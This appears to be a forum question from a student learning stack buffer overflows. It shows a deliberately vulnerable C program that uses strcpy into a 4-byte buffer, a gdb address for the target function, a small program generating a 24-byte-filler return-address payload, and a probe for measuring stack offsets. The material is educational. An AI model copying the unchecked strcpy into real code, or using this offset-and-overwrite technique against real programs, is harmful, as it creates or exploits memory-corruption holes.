I'm trying to understand the concept of a buffer overflow, and I'm having trouble calculating how much data needs to be written onto the stack so that it overflows in the right way. I've been given the following code (it's not mine, and yes, it's from a class, but this is not a graded assignment):
The goal is to get bar() to be executed.
#include <stdio.h>
#include <string.h>

void foo(char *s) {
    char buf[4];
    strcpy(buf, s);
    printf("You entered: [%s]", buf);
    fflush(stdout);
}

void bar() {
    printf("\n\nWhat? I was not supposed to be called!\n\n");
    fflush(stdout);
}

int main(int argc, char *argv[]) {
    if (argc != 2) {
        printf("Usage: %s some_string", argv[0]);
        return 2;
    }
    foo(argv[1]);
    return 0;
}
When I disassemble bar, I get its starting address:
(gdb) disas bar
Dump of assembler code for function bar:
0x000000000040062d <+0>: push %rbp
I was told that the input should be 28 bytes of data, with the last 4 bytes being \x2d\x06\x40\x00 (the address of bar, little-endian). What I don't understand is where the other 24 bytes come from, i.e., how you work out how much filler data has to be packed in before the address.
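For what it's worth, this is how I currently picture the payload being assembled, assuming the 24-byte filler figure is right and that bar really sits at 0x40062d (this is just my sketch, not part of the assignment; the filler content itself is arbitrary):

#include <stdio.h>

int main(void) {
    /* 24 bytes of arbitrary filler to reach the saved return address
       (assuming the 24-byte figure is correct for this build). */
    for (int i = 0; i < 24; i++)
        putchar('A');

    /* Low-order bytes of bar's address, 0x40062d, in little-endian order.
       The final 0x00 byte has to come from strcpy's terminating NUL,
       since a NUL can't be passed inside argv[1]. */
    fwrite("\x2d\x06\x40", 1, 3, stdout);
    return 0;
}

I imagine it would then be run as something like ./vuln "$(./payload)", where vuln and payload are just placeholder names for the two compiled programs.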
More generally, what interests me most is how to work out these numbers for any problem of this kind, not just this one.
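The only way I've thought of so far to measure it for an arbitrary function is to instrument a copy of the vulnerable function and print the distance from the buffer to the return-address slot. This is only a diagnostic sketch: it assumes GCC keeps a frame pointer (true without -fomit-frame-pointer at -O0) and that the instrumented copy gets the same stack layout as the original, which isn't guaranteed:

#include <stdio.h>
#include <string.h>

void foo_probe(char *s) {
    char buf[4];
    /* __builtin_frame_address(0) is the saved %rbp of this frame;
       on x86-64 the return address sits 8 bytes above it. */
    char *ret_slot = (char *)__builtin_frame_address(0) + 8;
    /* Subtracting pointers into different objects is technically
       undefined behaviour, but it works as a quick diagnostic. */
    printf("filler needed before the return address: %td bytes\n",
           ret_slot - buf);
    strcpy(buf, s);
}

int main(void) {
    foo_probe("abc");
    return 0;
}

Is that a reasonable way to think about it, or is there a cleaner way to read the layout straight off the disassembly?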
The code is C, compiled with GCC 4.4.7.